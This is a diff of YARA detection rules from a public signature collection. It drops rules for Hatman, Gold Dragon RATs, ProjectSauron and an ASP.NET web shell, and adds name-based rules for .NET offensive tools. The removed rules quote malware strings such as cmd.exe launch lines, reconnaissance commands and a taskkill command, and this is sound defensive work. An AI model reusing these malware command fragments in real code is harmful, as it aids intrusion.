+		reference = "https://github.com/RITRedteam/SharpWatchdogs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L286-L299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "697a9ebcea6a22a16ce1a51437fcb4e1a1d7f079"
-		logic_hash = "823a0a74b07c8f4821247b3cf0450069a9888d44ccd87144330da88594f260c0"
+		logic_hash = "3b9410d7e502a5fd55e534d8fe79710d48cf65a0e9859bdd0fea6c8d32311df0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii
-		$s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii
-		$s2 = "myProcess.Start()" fullword ascii
-		$s3 = "<p align=\"center\"><a href=\"?action=cmd\" target=\"_blank\">" fullword ascii
+		$name = "SharpWatchdogs" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 25KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Hatman_Compiled_Python : HATMAN
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpcat : FILE
 {
 	meta:
-		description = "Detects Hatman malware"
-		author = "DHS/NCCIC/ICS-CERT"
-		id = "fd156669-72b4-59a5-8f36-aac21d7b3105"
-		date = "2017-12-19"
-		modified = "2023-12-05"
-		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L86-L95"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a46be8d3-bf7b-5d86-b88b-33e6c8c152d8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Cn33liz/SharpCat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L301-L314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a18018e4c6ea5b7ab6e1dbdc050e565f66520676565db6d352f58a786097960f"
+		logic_hash = "b9e5946f8df1649e71abf014aa6579edbbc93a12ddcc56f8d85d97ae087c8711"
 		score = 75
 		quality = 85
-		tags = "HATMAN"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
-	condition:
-		SIGNATURE_BASE_Hatman_Nullsub_PRIVATE and SIGNATURE_BASE_Hatman_Setstatus_PRIVATE and SIGNATURE_BASE_Hatman_Dividers_PRIVATE
-}
-rule SIGNATURE_BASE_Hatman_Injector : HATMAN
-{
-	meta:
-		description = "Detects Hatman malware"
-		author = "DHS/NCCIC/ICS-CERT"
-		id = "b939b83d-cc4a-5998-89a7-8abf8d0b8592"
-		date = "2017-12-19"
-		modified = "2023-01-09"
-		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L96-L106"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19edf44bec6e1cbccefa145c5ae1bf0820729a80ac3ef1c8e7100b465b487e3c"
-		score = 75
-		quality = 85
-		tags = "HATMAN"
+	strings:
+		$name = "SharpCat" ascii wide fullword
+		$compile = "AssemblyTitle" ascii wide fullword
 
 	condition:
-		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Hatman_Payload : HATMAN
-{
-	meta:
-		description = "Detects Hatman malware"
-		author = "DHS/NCCIC/ICS-CERT"
-		id = "9ef57fca-a536-5937-8510-b410f735a73e"
-		date = "2017-12-19"
-		modified = "2023-12-05"
-		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L107-L116"
+rule SIGNATURE_BASE_HKTL_NET_NAME_K8Tools : FILE
+{
+	meta:
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "b30fc856-073d-542f-b222-a957322732c2"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/k8gege/K8tools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L316-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9a6e5d2c2f2be35e6dc8b418e33419977460006923ecd9f029cacf51d8c0477a"
+		logic_hash = "370cab83917bbc76f7f3a1b7793773ddf139879880e55efe59c72a07b34120f1"
 		score = 75
 		quality = 85
-		tags = "HATMAN"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$name = "K8tools" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origcode_PRIVATE and SIGNATURE_BASE_Hatman_Mftmsr_PRIVATE ) and not ( SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Golddragon_Malware_Feb18_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Httpsbeaconshell : FILE
 {
 	meta:
-		description = "Detects malware from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1da29f0f-4e83-56a0-b843-3b19d9b9a1b7"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L13-L29"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "3bd7234b-a23e-5818-aed1-52d42023943b"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L331-L344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "873cf7aa18027615fe8c44140879811254229a238f7d426144fb7c1a6e07ea74"
-		score = 90
+		logic_hash = "6a0d7e1f796ae6cefa297978c743916a08b2406c37fa2c1f3f697a17cb032517"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
+	strings:
+		$name = "HTTPSBeaconShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
+
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "168c2f7752511dfd263a83d5d08a90db" or pe.imphash ( ) == "0606858bdeb129de33a2b095d7806e74" or pe.imphash ( ) == "51d992f5b9e01533eb1356323ed1cb0f" or pe.imphash ( ) == "bb801224abd8562f9ee8fb261b75e32a" )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Golddragon_Aux_File : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostpack_Compiledbinaries : FILE
 {
 	meta:
-		description = "Detects export from Gold Dragon - February 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8f23dec4-e369-500f-a036-32df13e5543e"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L31-L44"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "7cc81894-8c01-5a17-a7ed-1cb4cf1e2d53"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L346-L359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4c5eb04cdafe3a69e584c64b833d8c6d21890660e92cc050bb29798dbcdf5326"
-		score = 90
+		logic_hash = "a8e90f07b7d1ec309e51e3606169a05c4bb2b2aa7e31ca26b21f927d648c13cd"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "/////////////////////regkeyenum////////////" ascii
+		$name = "Ghostpack-CompiledBinaries" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 500KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Golddragon_Ghost419_RAT : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Metasploit_Sharp : FILE
 {
 	meta:
-		description = "Detects Ghost419 RAT from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ac951d5-4a18-50c5-8ded-8a0a6b585fd6"
-		date = "2018-02-03"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/rW1yvZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L46-L86"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "b425f241-4887-5368-b42b-3fbbd3b769c6"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/VolatileMindsLLC/metasploit-sharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L361-L374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b953c5e21c332add4ff3b8fef9d623904eb929b0e7fc86e6c7109cd81bc3819b"
+		logic_hash = "7a1c4e077e197a5cdca8cb12713abb3fa86a3f6ea8e8f2f632c9c8e42d829acc"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "45bfa1327c2c0118c152c7192ada429c6d4ae03b8164ebe36ab5ba9a84f5d7aa"
-		hash2 = "ee7a9a7589cbbcac8b6bf1a3d9c5d1c1ada98e68ac2f43ff93f768661b7e4a85"
-		hash3 = "dee482e5f461a8e531a6a7ea4728535aafdc4941a8939bc3c55f6cb28c46ad3d"
-		hash4 = "2df9e274ce0e71964aca4183cec01fb63566a907981a9e7384c0d73f86578fe4"
-		hash5 = "111ab6aa14ef1f8359c59b43778b76c7be5ca72dc1372a3603cd5814bfb2850d"
-		hash6 = "0ca12b78644f7e4141083dbb850acbacbebfd3cfa17a4849db844e3f7ef1bee5"
-		hash7 = "ae1b32aac4d8a35e2c62e334b794373c7457ebfaaab5e5e8e46f3928af07cde4"
-		hash8 = "c54837d0b856205bd4ae01887aae9178f55f16e0e1a1e1ff59bd18dbc8a3dd82"
-		hash9 = "db350bb43179f2a43a1330d82f3afeb900db5ff5094c2364d0767a3e6b97c854"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x2 = "WebKitFormBoundarywhpFxMBe19cSjFnG" ascii
-		$x3 = "\\Microsoft\\HNC\\" ascii
-		$x4 = "\\anternet abplorer" ascii
-		$x5 = "%s\\abxplore.exe" fullword ascii
-		$x6 = "GHOST419" fullword ascii
-		$x7 = "I,m Online. %04d - %02d - %02d - %02d - %02d" fullword ascii
-		$x8 = "//////////////////////////regkeyenum//////////////" ascii
-		$s0 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii
-		$s1 = "www.GoldDragon.com" fullword ascii
-		$s2 = "/c systeminfo >> %s" fullword ascii
-		$s3 = "/c dir %s\\ >> %s" fullword ascii
-		$s4 = "DownLoading %02x, %02x, %02x" fullword ascii
-		$s5 = "Tran_dll.dll" fullword ascii
-		$s6 = "MpCmdRunkr.dll" fullword ascii
-		$s7 = "MpCmdRun.dll" fullword ascii
+		$name = "metasploit-sharp" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( ( pe.exports ( "ExportFunction" ) and pe.number_of_exports == 1 ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Golddragon_Runningrat : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Trevorc2 : FILE
 {
 	meta:
-		description = "Detects Running RAT from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7de93103-46a5-5aba-90cf-26735a6a580e"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/rW1yvZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L88-L128"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d1634a0d-6964-5886-b836-85c3ce6b8a17"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/trustedsec/trevorc2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L376-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "02b0ac613bb01cb5bbe947661880070790bbb7c6ba9925e70bc200df34747a0b"
+		logic_hash = "c1d56ef865e6619d9d0deff90b154c63cc3036a8521d3952819e45f51fca9fea"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0852f2c5741997d8899a34bb95c349d7a9fb7277cd0910656c3ce37a6f11cb88"
-		hash2 = "2981e1a1b3c395cee6e4b9e6c46d062cf6130546b04401d724750e4c8382c863"
-		hash3 = "7aa99ebc49a130f07304ed25655862a04cc20cb59d129e1416a7dfa04f7d3e51"
 
 	strings:
-		$x1 = "C:\\USERS\\WIN7_x64\\result.log" fullword wide
-		$x2 = "rundll32.exe %s RunningRat" fullword ascii
-		$x3 = "SystemRat.dll" fullword ascii
-		$x4 = "rundll32.exe %s ExportFunction" fullword ascii
-		$x5 = "rundll32.exe \"%s\" RunningRat" fullword ascii
-		$x6 = "ixeorat.bin" fullword ascii
-		$x7 = "C:\\USERS\\Public\\result.log" fullword ascii
-		$a1 = "emanybtsohteg" fullword ascii
-		$a2 = "tekcosesolc" fullword ascii
-		$a3 = "emankcosteg" fullword ascii
-		$a4 = "emantsohteg" fullword ascii
-		$a5 = "tpokcostes" fullword ascii
-		$a6 = "putratSASW" fullword ascii
-		$s1 = "ParentDll.dll" fullword ascii
-		$s2 = "MR - Already Existed" fullword ascii
-		$s3 = "MR First Started, Registed OK!" fullword ascii
-		$s4 = "RM-M : LoadResource OK!" fullword ascii
-		$s5 = "D:\\result.log" fullword ascii
+		$name = "trevorc2" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "c78ccc8f02286648c4373d3bf03efc43" or pe.exports ( "RunningRat" ) or 1 of ( $x* ) or 5 of ( $a* ) or 3 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Golddragon_Runnignrat : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_DNS2 : FILE
 {
 	meta:
-		description = "Detects Running RAT malware from Gold Dragon report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b99b89a4-a764-5d72-8360-8e53461267d9"
-		date = "2018-02-03"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/rW1yvZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_golddragon.yar#L130-L154"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "0fa01355-de57-573e-9056-0b7a5d24572d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L391-L404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bcc2ebbd54c31cf418430149eb558e8e26355161d0b53f403e7dfd2e1707baa"
+		logic_hash = "765e6117f69fb58e5e71544badc8135b2ec641a74cc0489a7c79308ca2837bd7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579"
-		hash2 = "5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b"
-		hash3 = "98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd.exe /c systeminfo " fullword ascii
-		$s2 = "ieproxy.dll" fullword ascii
-		$s3 = "taskkill /f /im daumcleaner.exe" fullword ascii
-		$s4 = "cmd.exe /c tasklist " fullword ascii
-		$s5 = "rundll32.exe \"%s\" Run" fullword ascii
-		$s6 = "Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0" fullword ascii
-		$s7 = "%s\\%s_%03d" fullword wide
-		$s8 = "\\PI_001.dat" ascii
+		$name = "NativePayload_DNS2" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Pipe_Backdoor : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Aggressiveproxy : FILE
 {
 	meta:
-		description = "Rule to detect ProjectSauron pipe backdoors"
-		author = "Kaspersky Lab"
-		id = "5a1dd4b3-a03c-51bb-a7bc-25729b487f70"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L4-L21"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "e2d3c4e2-404b-59f8-b3d0-a7cef4dfd0ff"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/EncodeGroup/AggressiveProxy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L406-L419"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "72f6c6fa65f15e4bab18a0f9d5b5b2f571b21d70c7ff306020784ce604a2e0a5"
+		logic_hash = "702b0cc858cb1687962ac403a730e5f778bf51fc91627c50103e4299f4a3ca5f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "CreateNamedPipeW" fullword ascii
-		$a2 = "SetSecurityDescriptorDacl" fullword ascii
-		$a3 = "GetOverlappedResult" fullword ascii
-		$a4 = "TerminateThread" fullword ascii
-		$a5 = "%s%s%X" fullword wide
+		$name = "AggressiveProxy" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) ) and filesize < 100000
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_LSA : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Msbuildapicaller : FILE
 {
 	meta:
-		description = "Rule to detect ProjectSauron encrypted LSA samples"
-		author = "Kaspersky Lab"
-		id = "f6fd8619-60f0-5c0d-aa66-cd0e154de63c"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L23-L47"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "143da57f-b01f-5688-b741-1bc4d06cd7d1"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/rvrsh3ll/MSBuildAPICaller"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L421-L434"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aaeee77b596e304836e23241fdc602d0ffed3379b386724210859c84033ac2b5"
+		logic_hash = "3c1f33c759e6331c562dbf76ce7e34ee82d10070e331d0967143d9d7fad077fc"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492" fullword ascii
-		$a2 = "\\Device\\NdisRaw_" ascii
-		$a3 = "\\\\.\\GLOBALROOT\\Device\\{8EDB44DC-86F0-4E0E-8068-BD2CABA4057A}" fullword wide
-		$a4 = "Global\\{a07f6ba7-8383-4104-a154-e582e85a32eb}" fullword wide
-		$a5 = "Missing function %S::#%d" fullword wide
-		$a6 = {8945D08D8598FEFFFF2BD08945D88D45BC83C20450C745C0030000008975C48955DCFF55FC8BF88D8F0000003A83F90977305333DB53FF15}
-		$a7 = {488D4C24304889442450488D452044886424304889442460488D4520C7442434030000002BD848897C243844896C244083C308895C246841FFD68D880000003A8BD883F909772DFF}
+		$name = "MSBuildAPICaller" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) or ( pe.exports ( "InitializeChangeNotify" ) and pe.exports ( "PasswordChangeNotify" ) and math.entropy ( 0x400 , filesize ) >= 7.5 ) ) and filesize < 1000000
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_SSPI : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Graykeylogger : FILE
 {
 	meta:
-		description = "Rule to detect encrypted ProjectSauron SSPI samples"
-		author = "Kaspersky Lab"
-		id = "43c0e772-46d2-510e-bea1-6f505199f38c"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L49-L63"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "c63875b6-1701-5594-927e-833c25dc5d98"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/DarkSecDevelopers/GrayKeylogger"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L436-L449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99d7444ffc45076e97ac3f5c9909ae26a927bbdcfef274d12d162c59e8113d65"
+		logic_hash = "b8e12c5ddf0d50d0b3681594c8bc3410a24dab00035a5959e20d20045dacbbbd"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$name = "GrayKeylogger" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1000000 and pe.exports ( "InitSecurityInterfaceA" ) and pe.characteristics & pe.DLL and ( pe.machine == pe.MACHINE_AMD64 or pe.machine == pe.MACHINE_IA64 ) and math.entropy ( 0x400 , filesize ) >= 7.5
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Apt_Projectsauron_Mytrampoline : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Weevely3 : FILE
 {
 	meta:
-		description = "Rule to detect ProjectSauron MyTrampoline module"
-		author = "Kaspersky Lab"
-		id = "b4f2cabf-11da-5fa1-8c23-0a177f8a4741"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L65-L83"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "6bf766b6-d065-5a84-8258-3be448b9cbb8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/epinna/weevely3"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L451-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bd98815fbf6e82cf477e4f4f98360a4c132b2b21e2e5991f6c10903bd4df52b"
+		logic_hash = "c57c6ba5276679a2d32e9b0ebb61059c5bed1ba45f9792ecef3d5c7244f38f24"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = ":\\System Volume Information\\{" wide
-		$a2 = "\\\\.\\PhysicalDrive%d" wide
-		$a3 = "DMWndClassX%d"
-		$b1 = "{774476DF-C00F-4e3a-BF4A-6D8618CFA532}" ascii wide
-		$b2 = "{820C02A4-578A-4750-A409-62C98F5E9237}" ascii wide
+		$name = "weevely3" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( all of ( $a* ) or any of ( $b* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-
-rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_Container : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Fudgec2 : FILE
 {
 	meta:
-		description = "Rule to detect ProjectSauron samples encrypted container"
-		author = "Kaspersky Lab"
-		id = "4462ebd9-24eb-570a-94b8-6fa6bf2a5a63"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron.yara#L85-L103"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a8e70bce-76dd-53dc-9a19-1cc6795fdef3"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Ziconius/FudgeC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L466-L479"
